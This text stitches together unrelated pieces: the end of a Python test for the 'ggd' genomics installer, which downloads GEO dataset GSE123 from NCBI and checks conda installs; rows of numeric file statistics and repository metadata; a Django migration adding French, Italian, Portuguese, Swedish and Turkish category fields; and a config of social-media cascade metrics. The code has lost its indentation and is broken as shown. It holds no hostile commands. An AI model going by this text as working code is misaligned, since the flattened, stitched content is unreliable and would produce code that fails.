assert yaml_dict["about"]["identifiers"]["genome-build"] == orig_yaml["about"]["identifiers"]["genome-build"]
assert yaml_dict["about"]["identifiers"]["species"] == orig_yaml["about"]["identifiers"]["species"]
assert "updated-species" in yaml_dict["about"]["identifiers"]
assert yaml_dict["about"]["identifiers"]["updated-species"] == "Mus musculus"
assert "parent-meta-recipe" in yaml_dict["about"]["identifiers"]
assert yaml_dict["about"]["identifiers"]["parent-meta-recipe"] == "meta-recipe-geo-accession-geo-v1"
assert yaml_dict["about"]["keywords"] != orig_yaml["about"]["keywords"]
assert yaml_dict["about"]["summary"] != orig_yaml["about"]["summary"]
assert yaml_dict["about"]["tags"]["data-provider"] == orig_yaml["about"]["tags"]["data-provider"]
assert yaml_dict["about"]["tags"]["data-version"] != orig_yaml["about"]["tags"]["data-version"]
assert yaml_dict["about"]["tags"]["genomic-coordinate-base"] == orig_yaml["about"]["tags"]["genomic-coordinate-base"]
## Check the installed files
species = "meta-recipe"
build = "meta-recipe"
name = "gse123-geo-v1"
version = "1"
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_family.soft.gz"))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_series_matrix.txt.gz")) ## From TAR file
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3227_jzo026-rp1-v5-u74av2.CEL.gz")) ## From TAR file
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3225_jzo016-rp1-v5-u74av2.CEL.gz")) ## From TAR file
assert not os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_RAW.tar")) ## Tar file should not exists after install it
## Check that the file is in ggd list
from ggd import list_installed_pkgs
args = Namespace(command='list', pattern="gse123-geo-v1", prefix=None, reset=False)
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
list_installed_pkgs.list_installed_packages((), args)
output = temp_stdout.getvalue().strip()
assert "gse123-geo-v1" in output
## test the it can be uninstalled
try:
sp.check_call(["ggd", "uninstall", "gse123-geo-v1"])
except subprocess.CalledProcessError as e:
print(str(e))
assert False
## Temp different conda environment
temp_env = os.path.join(utils.conda_root(), "envs", "temp_geo_meta_recipe")
### Remove temp env if it already exists
sp.check_output(["conda", "env", "remove", "--name", "temp_geo_meta_recipe"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
### Create the temp environment
sp.check_output(["conda", "create", "--name", "temp_geo_meta_recipe"])
recipes = ["meta-recipe-geo-accession-geo-v1"]
args = Namespace(channel='genomics', command='install', debug=False, name=recipes, file=[], prefix=temp_env, id = "GSE123")
## Test install with a meta-recipe but no id
assert install.install((), args)
## Check for update in the ecipe and yaml files
recipe_contents = ""
yaml_dict = {}
with tarfile.open(os.path.join(temp_env,"pkgs",os.path.basename(tarball_file_path.replace("meta-recipe-geo-accession-geo-v1","gse123-geo-v1"))), mode="r|bz2") as tf:
for info in tf:
if info.name == "info/recipe/recipe.sh":
recipe_contents = tf.extractfile(info)
recipe_contents = recipe_contents.read().decode()
elif info.name == "info/recipe/meta.yaml.template":
yaml_dict = tf.extractfile(info)
yaml_dict = yaml.safe_load(yaml_dict.read().decode())
## Check the recipe contents
assert recipe_contents == (
"""
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/soft/GSE123_family.soft.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/matrix/GSE123_series_matrix.txt.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/suppl/GSE123_RAW.tar" -O -J --silent
tar -xf GSE123_RAW.tar
""")
## check the yaml file
assert yaml_dict["build"]["noarch"] == orig_yaml["build"]["noarch"]
assert yaml_dict["build"]["number"] == orig_yaml["build"]["number"]
assert yaml_dict["package"]["name"] != orig_yaml["package"]["name"]
assert yaml_dict["package"]["name"] == "gse123-geo-v1"
assert yaml_dict["package"]["version"] == orig_yaml["package"]["version"]
assert yaml_dict["about"]["identifiers"]["genome-build"] == orig_yaml["about"]["identifiers"]["genome-build"]
assert yaml_dict["about"]["identifiers"]["species"] == orig_yaml["about"]["identifiers"]["species"]
assert "updated-species" in yaml_dict["about"]["identifiers"]
assert yaml_dict["about"]["identifiers"]["updated-species"] == "Mus musculus"
assert "parent-meta-recipe" in yaml_dict["about"]["identifiers"]
assert yaml_dict["about"]["identifiers"]["parent-meta-recipe"] == "meta-recipe-geo-accession-geo-v1"
assert yaml_dict["about"]["keywords"] != orig_yaml["about"]["keywords"]
assert yaml_dict["about"]["summary"] != orig_yaml["about"]["summary"]
assert yaml_dict["about"]["tags"]["data-provider"] == orig_yaml["about"]["tags"]["data-provider"]
assert yaml_dict["about"]["tags"]["data-version"] != orig_yaml["about"]["tags"]["data-version"]
assert yaml_dict["about"]["tags"]["genomic-coordinate-base"] == orig_yaml["about"]["tags"]["genomic-coordinate-base"]
## Check the installed files
species = "meta-recipe"
build = "meta-recipe"
name = "gse123-geo-v1"
version = "1"
assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,name,version))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSE123_family.soft.gz"))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSE123_series_matrix.txt.gz")) ## From TAR file
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSM3227_jzo026-rp1-v5-u74av2.CEL.gz")) ## From TAR file
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSM3225_jzo016-rp1-v5-u74av2.CEL.gz")) ## From TAR file
assert not os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSE123_RAW.tar")) ## Tar file should not exists after install it
## recipe should not be isntalled in the current environmnet
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_family.soft.gz")) == False
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_series_matrix.txt.gz")) == False## From TAR file
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3227_jzo026-rp1-v5-u74av2.CEL.gz")) == False ## From TAR file
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3225_jzo016-rp1-v5-u74av2.CEL.gz")) == False ## From TAR file
## Check that the file is in ggd list
from ggd import list_installed_pkgs
args = Namespace(command='list', pattern="gse123-geo-v1", prefix=temp_env, reset=False)
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
list_installed_pkgs.list_installed_packages((), args)
output = temp_stdout.getvalue().strip()
assert "gse123-geo-v1" in output
### Remove temp env
sp.check_output(["conda", "env", "remove", "--name", "temp_geo_meta_recipe"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
assert os.path.exists(temp_env) == False
## Test install without
recipes = ["meta-recipe-geo-accession-geo-v1"]
args = Namespace(channel='genomics', command='install', debug=False, name=recipes, file=[], prefix=None, id = None)
## Test install with a meta-recipe but no id
temp_stdout = StringIO()
with pytest.raises(SystemExit) as pytest_wrapped_e, redirect_stdout(temp_stdout):
install.install((), args)
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
output = temp_stdout.getvalue().strip()
assert ":ggd:install: {} is a meta-recipe. Checking meta-recipe for installation".format("meta-recipe-geo-accession-geo-v1") in output
assert ":ggd:install: An ID is required in order to install a GGD meta-recipe. Please add the '--id <Some ID>' flag and try again" in output
## Test install with mutliple packages
recipes = ["grch37-chromsizes-ggd-v1","meta-recipe-geo-accession-geo-v1"]
args = Namespace(channel='genomics', command='install', debug=False, name=recipes, file=[], prefix=None, id = "GSE123")
## Test install with a meta-recipe but no id
temp_stdout = StringIO()
with pytest.raises(SystemExit) as pytest_wrapped_e, redirect_stdout(temp_stdout):
install.install((), args)
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
output = temp_stdout.getvalue().strip()
assert ":ggd:install: Looking for grch37-chromsizes-ggd-v1 in the 'ggd-genomics' channel" in output
assert ":ggd:install: grch37-chromsizes-ggd-v1 version 1 is not installed on your system" in output
assert ":ggd:install: grch37-chromsizes-ggd-v1 has not been installed by conda" in output
assert ":ggd:install: Looking for meta-recipe-geo-accession-geo-v1 in the 'ggd-genomics' channel" in output
assert ":ggd:install: meta-recipe-geo-accession-geo-v1 exists in the ggd-genomics channel" in output
assert ":ggd:install: meta-recipe-geo-accession-geo-v1 is a meta-recipe. Checking meta-recipe for installation" in output
assert ":ggd:install: GGD is currently only able to install a single meta-recipe at a time. Please remove other pkgs and install them with a subsequent command" in output
## Remove tmp dir
if os.path.exists(tmpdir):
shutil.rmtree(tmpdir)
| 48.792538
| 388
| 0.650443
| 16,021
| 119,005
| 4.694214
| 0.037076
| 0.024812
| 0.022206
| 0.019214
| 0.888945
| 0.871114
| 0.853629
| 0.83738
| 0.821743
| 0.80697
| 0
| 0.016779
| 0.195193
| 119,005
| 2,438
| 389
| 48.812551
| 0.768449
| 0.152994
| 0
| 0.780726
| 0
| 0.03352
| 0.30468
| 0.051537
| 0
| 0
| 0
| 0
| 0.25419
| 1
| 0.023743
| false
| 0.026536
| 0.030028
| 0
| 0.053771
| 0.005587
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4dc3d90da33d331cef6b0eb1065c97fb71d8d868
| 2,191
|
py
|
Python
|
openbook_categories/migrations/0008_auto_20190808_1719.py
|
TamaraAbells/okuna-api
|
f87d8e80d2f182c01dbce68155ded0078ee707e4
|
[
"MIT"
] | 164
|
2019-07-29T17:59:06.000Z
|
2022-03-19T21:36:01.000Z
|
openbook_categories/migrations/0008_auto_20190808_1719.py
|
TamaraAbells/okuna-api
|
f87d8e80d2f182c01dbce68155ded0078ee707e4
|
[
"MIT"
] | 188
|
2019-03-16T09:53:25.000Z
|
2019-07-25T14:57:24.000Z
|
openbook_categories/migrations/0008_auto_20190808_1719.py
|
TamaraAbells/okuna-api
|
f87d8e80d2f182c01dbce68155ded0078ee707e4
|
[
"MIT"
] | 80
|
2019-08-03T17:49:08.000Z
|
2022-02-28T16:56:33.000Z
|
# Generated by Django 2.2.4 on 2019-08-08 15:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('openbook_categories', '0007_auto_20190801_1255'),
]
operations = [
migrations.AddField(
model_name='category',
name='description_fr',
field=models.CharField(max_length=64, null=True, verbose_name='description'),
),
migrations.AddField(
model_name='category',
name='description_it',
field=models.CharField(max_length=64, null=True, verbose_name='description'),
),
migrations.AddField(
model_name='category',
name='description_pt_br',
field=models.CharField(max_length=64, null=True, verbose_name='description'),
),
migrations.AddField(
model_name='category',
name='description_sv',
field=models.CharField(max_length=64, null=True, verbose_name='description'),
),
migrations.AddField(
model_name='category',
name='description_tr',
field=models.CharField(max_length=64, null=True, verbose_name='description'),
),
migrations.AddField(
model_name='category',
name='title_fr',
field=models.CharField(max_length=64, null=True, verbose_name='title'),
),
migrations.AddField(
model_name='category',
name='title_it',
field=models.CharField(max_length=64, null=True, verbose_name='title'),
),
migrations.AddField(
model_name='category',
name='title_pt_br',
field=models.CharField(max_length=64, null=True, verbose_name='title'),
),
migrations.AddField(
model_name='category',
name='title_sv',
field=models.CharField(max_length=64, null=True, verbose_name='title'),
),
migrations.AddField(
model_name='category',
name='title_tr',
field=models.CharField(max_length=64, null=True, verbose_name='title'),
),
]
| 34.234375
| 89
| 0.584665
| 222
| 2,191
| 5.563063
| 0.202703
| 0.145749
| 0.186235
| 0.218623
| 0.869636
| 0.869636
| 0.869636
| 0.825101
| 0.825101
| 0.825101
| 0
| 0.032967
| 0.29393
| 2,191
| 63
| 90
| 34.777778
| 0.765352
| 0.020539
| 0
| 0.701754
| 1
| 0
| 0.148321
| 0.010728
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017544
| 0
| 0.070175
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4dfe94b6ae401042d33ed8d3f776ae479ec32eb6
| 23,029
|
py
|
Python
|
december-measurements/config/cascade_metrics_config_twitter.py
|
diogofpacheco/socialsim
|
4ca3625ce62321804864bd25fc3cb80d9adc16c5
|
[
"BSD-2-Clause"
] | 25
|
2018-03-27T20:59:09.000Z
|
2021-05-25T18:37:46.000Z
|
december-measurements/config/cascade_metrics_config_twitter.py
|
diogofpacheco/socialsim
|
4ca3625ce62321804864bd25fc3cb80d9adc16c5
|
[
"BSD-2-Clause"
] | 27
|
2018-04-18T15:54:50.000Z
|
2019-11-22T19:52:19.000Z
|
december-measurements/config/cascade_metrics_config_twitter.py
|
diogofpacheco/socialsim
|
4ca3625ce62321804864bd25fc3cb80d9adc16c5
|
[
"BSD-2-Clause"
] | 11
|
2018-04-09T18:12:32.000Z
|
2022-01-26T06:31:17.000Z
|
import Metrics
from functools import partial, update_wrapper
def named_partial(func, *args, **kwargs):
partial_func = partial(func, *args, **kwargs)
update_wrapper(partial_func, func)
partial_func.varnames = func.__code__.co_varnames
return partial_func
def get_node_level_measurements_params(time_granularity):
"""
Return params dictionary for node level (i.e. cascade) measurements
for the given cascade passed by root_id
:param time_granularity: "Y", "M", "D", "H" [years/months/days/hours] for timeseries measurements
:return: node_level_measurement_params
"""
# ["depth", "breadth", "size", "structural_virality", "unique_nodes", "new_node_ratio"])
node_level_measurement_params = {
"cascade_max_depth_over_time": {
"scale":"node",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":False,
"measurement":"get_node_level_measurements",
"measurement_args":{"single_cascade_measurement": "cascade_timeseries_of", "attribute": "depth", "time_granularity": time_granularity},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer',fill_value="ffill"),
"nrmse":named_partial(Metrics.rmse,relative=True,join='outer',fill_value='ffill'),
"r2": named_partial(Metrics.r2,join='outer',fill_value="ffill")},
"temporal_vs_batch":"Temporal"
},
"cascade_breadth_by_time": {
"scale":"node",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":False,
"measurement":"get_node_level_measurements",
"measurement_args":{"single_cascade_measurement": "cascade_timeseries_of", "attribute": "breadth", "time_granularity": time_granularity},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer',fill_value="ffill"),
"nrmse":named_partial(Metrics.rmse,relative=True,join='outer',fill_value='ffill'),
"r2": named_partial(Metrics.r2,join='outer',fill_value="ffill")},
"temporal_vs_batch":"Temporal"
},
"cascade_structural_virality_over_time": {
"scale":"node",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":False,
"measurement":"get_node_level_measurements",
"measurement_args":{"single_cascade_measurement": "cascade_timeseries_of", "attribute": "structural_virality", "time_granularity": time_granularity},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer',fill_value=0),
"nrmse": named_partial(Metrics.rmse,join='outer',fill_value=0,relative=True),
"r2": named_partial(Metrics.r2,join='outer',fill_value=0)},
"temporal_vs_batch":"Temporal"
},
"cascade_size_over_time": {
"scale":"node",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":False,
"measurement":"get_node_level_measurements",
"measurement_args":{"single_cascade_measurement": "cascade_timeseries_of", "attribute": "size", "time_granularity": time_granularity},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer',fill_value="ffill"),
"nrmse": named_partial(Metrics.rmse,join='outer',fill_value="ffill", relative=True),
"r2": named_partial(Metrics.r2,join='outer',fill_value="ffill")},
"temporal_vs_batch":"Temporal"
},
"cascade_uniq_users_by_time": {
"scale": "node",
"node_type": "Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":False,
"measurement":"get_node_level_measurements",
"measurement_args":{"single_cascade_measurement": "cascade_timeseries_of", "attribute": "unique_nodes", "time_granularity": time_granularity},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer',fill_value="ffill"),
"nrmse": named_partial(Metrics.rmse,join='outer',fill_value="ffill",relative=True),
"r2": named_partial(Metrics.r2,join='outer',fill_value="ffill")},
"temporal_vs_batch": "Temporal"
},
"cascade_new_user_ratio_by_time": {
"scale": "node",
"node_type": "Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":False,
"measurement":"get_node_level_measurements",
"measurement_args":{"single_cascade_measurement": "cascade_timeseries_of", "attribute": "new_node_ratio", "time_granularity": time_granularity},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer',fill_value=0),
"nrmse": named_partial(Metrics.rmse,join='outer',fill_value=0,relative=True),
"r2": named_partial(Metrics.r2,join='outer',fill_value=0)},
"temporal_vs_batch": "Temporal"
},
"cascade_breadth_by_depth": {
"scale":"node",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":False,
"measurement":"get_node_level_measurements",
"measurement_args":{"single_cascade_measurement": "cascade_depth_by", "attribute": "breadth"},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer'),
"nrmse": named_partial(Metrics.rmse,join='outer',relative=True),
"r2": named_partial(Metrics.r2,join='outer')},
"temporal_vs_batch":"Batch"
},
"cascade_new_user_ratio_by_depth": {
"scale":"node",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":False,
"measurement":"get_node_level_measurements",
"measurement_args":{"single_cascade_measurement": "cascade_depth_by", "attribute": "new_node_ratio"},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer'),
"nrmse": named_partial(Metrics.rmse,join='outer',relative=True),
"r2": named_partial(Metrics.r2,join='outer')},
"temporal_vs_batch":"Batch"
},
"cascade_uniq_users_by_depth": {
"scale":"node",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":False,
"measurement":"get_node_level_measurements",
"measurement_args":{"single_cascade_measurement": "cascade_depth_by", "attribute": "unique_nodes"},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer'),
"nrmse": named_partial(Metrics.rmse,join='outer',relative=True),
"r2": named_partial(Metrics.r2,join='outer')},
"temporal_vs_batch":"Batch"
},
"cascade_participation_gini": {
"scale":"node",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":False,
"measurement":"get_node_level_measurements",
"measurement_args":{"single_cascade_measurement": "cascade_participation_gini"},
"metrics":{"absolute_percentage_error": Metrics.absolute_percentage_error,
"absolute_difference": Metrics.absolute_difference},
"temporal_vs_batch":"Batch"
},
"cascade_participation_palma": {
"scale":"node",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":False,
"measurement":"get_node_level_measurements",
"measurement_args":{"single_cascade_measurement": "cascade_participation_palma"},
"metrics":{"absolute_percentage_error": Metrics.absolute_percentage_error,
"absolute_difference": Metrics.absolute_difference},
"temporal_vs_batch":"Batch"
}
}
return node_level_measurement_params
def get_community_level_measurements_params(time_granularity="M"):
"""
Return params dictionary for community (i.e. subreddit) measurements
for the given community passed by community_id
:param time_granularity: "Y", "M", "D", "H" [years/months/days/hours] for timeseries measurements
:return: community_measurement_params
"""
community_measurement_params = {
"community_max_depth_distribution": {
"scale":"community",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"cascade_collection_distribution_of",
"measurement_args":{"attribute": "depth","community_grouper":"communityID"},
"metrics":{"js_divergence": named_partial(Metrics.js_divergence, discrete=False)},
"temporal_vs_batch":"Batch"
},
"community_max_breadth_distribution": {
"scale":"community",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"cascade_collection_distribution_of",
"measurement_args":{"attribute": "breadth","community_grouper":"communityID"},
"metrics":{"js_divergence": named_partial(Metrics.js_divergence, discrete=False)},
"temporal_vs_batch":"Batch"
},
"community_structural_virality_distribution": {
"scale":"community",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"cascade_collection_distribution_of",
"measurement_args":{"attribute": "structural_virality","community_grouper":"communityID"},
"metrics":{"js_divergence": named_partial(Metrics.js_divergence, discrete=False)},
"temporal_vs_batch":"Batch"
},
"community_cascade_size_distribution": {
"scale":"community",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"cascade_collection_distribution_of",
"measurement_args":{"attribute": "size","community_grouper":"communityID"},
"metrics":{"js_divergence": named_partial(Metrics.js_divergence, discrete=False)},
"temporal_vs_batch":"Batch"
},
"community_cascade_lifetime_distribution": {
"scale":"community",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"cascade_collection_distribution_of",
"measurement_args":{"attribute": "lifetime","community_grouper":"communityID"},
"metrics":{"rmse": Metrics.rmse,
"nrmse": named_partial(Metrics.rmse, relative=True),
"r2": Metrics.r2},
"temporal_vs_batch":"Temporal"
},
"community_cascade_size_timeseries": {
"scale":"community",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"get_cascade_collection_size_timeseries",
"measurement_args":{"community_grouper": "communityID", "time_granularity": time_granularity},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer',fill_value="ffill"),
"nrmse": named_partial(Metrics.rmse,join='outer',fill_value="ffill",relative=True),
"r2": named_partial(Metrics.r2,join='outer',fill_value="ffill")},
"temporal_vs_batch":"Temporal"
},
"community_cascade_lifetime_timeseries": {
"scale":"community",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"get_cascade_collection_timeline_timeseries",
"measurement_args":{"community_grouper": "communityID", "time_granularity": time_granularity},
"metrics":{"js_divergence": named_partial(Metrics.js_divergence, discrete=False)},
"temporal_vs_batch":"Batch"
},
"community_unique_users_by_time": {
"scale":"community",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"community_users_count",
"measurement_args":{"attribute": "unique_users", "community_grouper": "communityID", "time_granularity": time_granularity},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer',fill_value="ffill"),
"nrmse": named_partial(Metrics.rmse,join='outer',fill_value="ffill",relative=True),
"r2": named_partial(Metrics.r2,join='outer',fill_value="ffill")},
"temporal_vs_batch":"Temporal"
},
"community_new_user_ratio_by_time": {
"scale":"community",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"community_users_count",
"measurement_args":{"attribute": "new_user_ratio", "community_grouper": "communityID", "time_granularity": time_granularity},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer',fill_value=0),
"nrmse": named_partial(Metrics.rmse,join='outer',fill_value=0,relative=True),
"r2": named_partial(Metrics.r2,join='outer',fill_value=0)},
"temporal_vs_batch":"Temporal"
},
"community_cascade_initialization_gini": {
"scale":"community",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"cascade_collection_initialization_gini",
"measurement_args":{"community_grouper":"communityID"},
"metrics":{"absolute_percentage_error": Metrics.absolute_percentage_error,
"absolute_difference": Metrics.absolute_difference},
"temporal_vs_batch":"Batch"
},
"community_cascade_initialization_palma": {
"scale":"community",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"cascade_collection_initialization_palma",
"measurement_args":{"community_grouper":"communityID"},
"metrics":{"absolute_percentage_error": Metrics.absolute_percentage_error,
"absolute_difference": Metrics.absolute_difference},
"temporal_vs_batch":"Batch"
},
"community_cascade_participation_gini": {
"scale":"community",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"cascade_collection_participation_gini",
"measurement_args":{"community_grouper":"communityID"},
"metrics":{"absolute_percentage_error": Metrics.absolute_percentage_error,
"absolute_difference": Metrics.absolute_difference},
"temporal_vs_batch":"Batch"
},
"community_cascade_participation_palma": {
"scale":"community",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"cascade_collection_participation_palma",
"measurement_args":{"community_grouper":"communityID"},
"metrics":{"absolute_percentage_error": Metrics.absolute_percentage_error,
"absolute_difference": Metrics.absolute_difference},
"temporal_vs_batch":"Batch"
}
}
return community_measurement_params
def get_population_level_measurements_params(time_granularity="M"):
"""
Return params dictionary for population (i.e. all subreddits) measurements
:param time_granularity: "Y", "M", "D", "H" [years/months/days/hours] for timeseries measurements
:return: population_measurement_params
"""
population_measurement_params = {
"population_max_depth_distribution": {
"scale":"population",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement": "cascade_collection_distribution_of",
"measurement_args": {"attribute": "depth"},
"metrics":{"js_divergence": named_partial(Metrics.js_divergence, discrete=False)},
"temporal_vs_batch":"Batch"
},
"population_max_breadth_distribution": {
"scale":"population",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement": "cascade_collection_distribution_of",
"measurement_args": {"attribute": "breadth"},
"metrics":{"js_divergence": named_partial(Metrics.js_divergence, discrete=False)},
"temporal_vs_batch":"Batch"
},
"population_structural_virality_distribution": {
"scale":"population",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement": "cascade_collection_distribution_of",
"measurement_args": {"attribute": "structural_virality"},
"metrics":{"js_divergence": named_partial(Metrics.js_divergence, discrete=False)},
"temporal_vs_batch":"Batch"
},
"population_cascade_size_distribution": {
"scale":"population",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement": "cascade_collection_distribution_of",
"measurement_args": {"attribute": "size"},
"metrics":{"js_divergence": named_partial(Metrics.js_divergence, discrete=False)},
"temporal_vs_batch":"Batch"
},
"population_cascade_lifetime_distribution": {
"scale":"population",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement": "cascade_collection_distribution_of",
"measurement_args": {"attribute": "lifetime"},
"metrics":{"js_divergence": named_partial(Metrics.js_divergence, discrete=False)},
"temporal_vs_batch":"Batch"
},
"population_cascade_size_timeseries": {
"scale":"population",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"get_cascade_collection_size_timeseries",
"measurement_args":{"time_granularity": time_granularity},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer',fill_value="ffill"),
"nrmse": named_partial(Metrics.rmse,join='outer',fill_value="ffill",relative=True),
"r2": named_partial(Metrics.r2,join='outer',fill_value="ffill")},
"temporal_vs_batch":"Temporal"
},
"population_cascade_lifetime_timeseries": {
"scale":"population",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"get_cascade_collection_timeline_timeseries",
"measurement_args":{"time_granularity": time_granularity},
"metrics":{"rmse": named_partial(Metrics.rmse,join='outer'),
"nrmse": named_partial(Metrics.rmse,join='outer',relative=True),
"r2": named_partial(Metrics.r2,join='outer')},
"temporal_vs_batch":"Temporal"
},
"population_cascade_initialization_gini": {
"scale":"population",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"cascade_collection_initialization_gini",
"measurement_args":{ },
"metrics":{"absolute_percentage_error": Metrics.absolute_percentage_error,
"absolute_difference": Metrics.absolute_difference},
"temporal_vs_batch":"Batch"
},
"population_cascade_initialization_palma": {
"scale":"population",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"cascade_collection_initialization_palma",
"measurement_args":{ },
"metrics":{"absolute_percentage_error": Metrics.absolute_percentage_error,
"absolute_difference": Metrics.absolute_difference},
"temporal_vs_batch":"Batch"
},
"population_cascade_participation_gini": {
"scale":"population",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"cascade_collection_participation_gini",
"measurement_args":{ },
"metrics":{"absolute_percentage_error": Metrics.absolute_percentage_error,
"absolute_difference": Metrics.absolute_difference},
"temporal_vs_batch":"Batch"
},
"population_cascade_participation_palma": {
"scale":"population",
"node_type":"Cascade",
"scenario1":False,
"scenario2":True,
"scenario3":True,
"measurement":"cascade_collection_participation_palma",
"measurement_args":{ },
"metrics":{"absolute_percentage_error": Metrics.absolute_percentage_error,
"absolute_difference": Metrics.absolute_difference},
"temporal_vs_batch":"Batch"
}
}
return population_measurement_params
cascade_node_params = get_node_level_measurements_params('H')
cascade_community_params = get_community_level_measurements_params('D')
cascade_population_params = get_population_level_measurements_params('D')
cascade_measurement_params_twitter = {}
cascade_measurement_params_twitter.update(cascade_node_params)
#cascade_measurement_params.update(cascade_community_params)
cascade_measurement_params_twitter.update(cascade_population_params)
| 47.778008
| 161
| 0.596856
| 2,046
| 23,029
| 6.371457
| 0.051808
| 0.049709
| 0.077248
| 0.064437
| 0.905186
| 0.885931
| 0.86683
| 0.862688
| 0.862688
| 0.862688
| 0
| 0.008553
| 0.268878
| 23,029
| 481
| 162
| 47.877339
| 0.765695
| 0.037127
| 0
| 0.731111
| 0
| 0
| 0.397465
| 0.13718
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008889
| false
| 0
| 0.004444
| 0
| 0.022222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
